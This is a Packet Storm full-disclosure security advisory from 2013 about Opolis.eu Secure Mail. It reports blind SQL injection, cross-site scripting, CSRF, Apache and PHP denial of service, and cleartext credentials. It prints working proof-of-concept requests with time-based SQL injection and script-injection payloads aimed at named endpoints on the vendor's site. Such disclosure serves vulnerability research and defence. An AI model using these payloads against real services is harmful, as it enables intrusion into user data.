exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS

Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS
Posted Oct 7, 2013
Authored by Juan Carlos Garcia

Opolis.eu suffers from cross site request forgery, cross site scripting, denial of service, and remote blind SQL injection vulnerabilities. The vendor has not responded to the researchers reports of these issues.

tags | exploit, remote, denial of service, vulnerability, xss, sql injection, info disclosure, csrf
SHA-256 | 86e6756e6360245c7ec7594467c4b1d5869733852ffe83875227e09f6118918a

Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS

Change Mirror Download
=========================================================================================================================================================================
OPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text
==========================================================================================================================================================================

TIME-LINE VULNERABILITY

Multiples Advisories

Opolis Secure IT-Services GmbH

Address:Romberggasse 3
1230 Vienna
Austria
E-Mail Contact: helpdesk@opolis.eu<helpdesk@opolis.eu>

BUT

Not Response

THEN

Full Disclosure


I. VULNERABILITY
-------------------------
#Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text

#Vendor:http://www.opolis.eu/

#Author:Juan Carlos García (@secnight)

#Follow me
Twitter:@secnight

II. DESCRIPTION
-------------------------
Opolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service.
Opolis re-defines E-Mail with its “Power to the Sender” philosophy: The sender decides if or how E-Mails may be further
processed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions
for internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL.

III. PROOF OF CONCEPT
-------------------------

Blind SQL Injection
********************

Vulnerability description
-------------------------

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and

doesn't properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.

Affected items
----------------

/createOpolisWorkGroup/createOpolisWorkGroupStep5.php


URL encoded POST input checkedemail was set to 1';select pg_sleep(2); --

POST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php

aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect

%20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc



/slimstat/stats_js.php

"ttl"

URL encoded GET input "ttl" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK

(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/



GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version

%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%

GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version

%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%


"url"

URL encoded GET input "url" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK

(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/



GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR

%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f


GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR

%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f


Cross site scripting ( 67 )
*********************

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies
or session tokens retained by the browser.

Affected items
----------------

/createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2)

URL encoded POST input OSMLogInNam was set to hkmohkhr_974672"():;934304


POST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php

checkloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304



/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2)

URL encoded POST input currentEmail was set to sample%40email.tst_940309"():;974560


POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php

currentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl



/OpolisSignUp/OpolisSignUpStep1a.php (2)

URL encoded POST input OSMLogInNam was set to etomstqd_911786"():;974637

POST /OpolisSignUp/OpolisSignUpStep1a.php

checkloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637




/OpolisSignUp/OpolisSignUpStep2a.php

URL encoded POST input currentEmail was set to sample%40email.tst_928249"():;986211

The input is reflected inside <script> tag between double quotes.



POST /OpolisSignUp/OpolisSignUpStep2a.php


currentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh


/createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3)

URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(939864) bad="


POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php

checkedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield=



/createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5)


URL encoded POST input checkedemail was set to 1" onmouseover=prompt(911118) bad="

POST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php

checkedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield



POST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. (5)

URL encoded POST input checkedemail was set to 1" onmouseover=prompt(967963) bad="

checkedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst



/createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52)

URL encoded POST input aicountry was set to Antarctica'"()&%<ScRiPt >prompt(973546)</ScRiPt>

aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt

%3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp




/OpolisSignUp/OpolisSignUpStep2a.php. (3)

URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(994853) bad="

checkedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield=


/OpolisSignUp/OpolisSignUpStep3a.php. (5)

URL encoded POST input checkedemail was set to 1" onmouseover=prompt(935016) bad="

checkedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield=


Cross Site Request Forgery CSRF (12)
*******************************

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF,
is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.


Affected items
---------------
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0)
/createOpolisWorkGroup/createOpolisWorkGroupStep3.php
/createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d)
/OpolisSignUp/OpolisSignUpStep1a.php
/OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0)
/OpolisSignUp/OpolisSignUpStep3a.php
/slimstat (9200b13decfada22b75676834e865e65)

The impact of this vulnerability
---------------------------------

An attacker may force the users of a web application to execute actions of the attacker's choosing.
A successful CSRF exploit can compromise end user data and operation in case of normal user.
If the targeted end user is the administrator account, this can compromise the entire web application.


Two examples ( too much security flaws .. )

/createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2)

Attack details
----------------
Form name: OSMSignUp
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php
Form method: POST

Form inputs:

checkloginname [Hidden]
OSMLogInNam [Text]


/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0).

Attack details
-----------------
Form name: OSMSignUp
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php
Form method: POST

Form inputs:

showcheckedloginname [Text]
currentEmail [Text]

POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php

checkedloginname=&showEmailfield=



Apache httpd Remote D.O.S (2)
**************************

Vulnerability description
-------------------------------
A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tools has been observed.

The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.


Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).


How to fix this vulnerability
----------------------------
Upgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site.

Web references
--------------
CVE-2011-3192
Apache HTTPD Security ADVISORY
Apache HTTP Server 2.2.20 Released
Apache httpd Remote Denial of Service (memory exhaustion)


Apache httpOnly cookie disclosure
**********************************

Vulnerability description
----------------------------
Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors

involving a (1) long or (2) malformed header in conjunction with crafted web script.

Affected Apache versions (up to 2.0.21).

The impact of this vulnerability
-------------------------------
Information disclosure.

How to fix this vulnerability
------------------------------
Upgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue.

Web references
---------------
Fixed in Apache httpd 2.2.22
Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability



PHP hangs on parsing particular strings as floating point number (2)
*****************************************************************

PHP hangs when parsing '2.2250738585072011e-308' string as a floating point number.

Current version is : PHP/5.3.1

Affected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17

Affected items
---------------
Web Server

The impact of this vulnerability
----------------------------------
Denial of service attack

How to fix this vulnerability
-------------------------------
Upgrade PHP to the latest version.

Web references
-----------------
PHP Hangs On Numeric Value 2.2250738585072011e-308
PHP Homepage


User credentials are sent in clear text
*****************************************

Vulnerability description
---------------------------
User credentials are transmitted over an unencrypted channel.
This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users.

Affected items
--------------
/slimstat (9200b13decfada22b75676834e865e65)

The impact of this vulnerability
----------------------------------
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

How to fix this vulnerability
-------------------------------
Because user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS).


IV. BUSINESS IMPACT
-------------------------

( No Comments... )

V SOLUTION
------------------------

Very easy and I don´t understand... WRITE SECURE CODE P L E A S E !!


VI. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)


VII. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close